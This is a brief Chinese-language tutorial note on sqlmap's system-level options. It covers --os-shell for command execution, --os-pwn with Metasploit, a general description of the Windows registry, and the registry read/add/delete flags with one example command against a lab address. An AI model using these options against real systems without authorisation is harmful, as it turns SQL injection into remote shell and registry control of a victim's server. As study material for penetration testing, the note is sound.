Sqlmap系统参数
1. Sqlmap执行系统命令
–os-shell
2. Sqlmap结合Metasploit
python sqlmap.py -u “注入点” --os-pwn MySQL and PostgreSQL
3.注册表介绍
注册表(Registry,繁体中文版Windows操作系统称之为登录档)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息。早在Windows 3.0推出OLE技术的时候,注册表就已经出现。随后推出的Windows NT是第一个从系统级别广泛使用注册表的操作系统。但是,从Microsoft Windows 95操作系统开始,注册表才真正成为Windows用户经常接触的内容,并在其后的操作系统中继续沿用至今。
4. Sqlmap注册表操作
–reg-read
–reg-add
–reg-del
–reg-key, --reg-value, --reg-data --reg-type
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --r
eg-add --reg-key=“HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap” --reg-value=Test --reg-ty
pe=REG_SZ --reg-data=1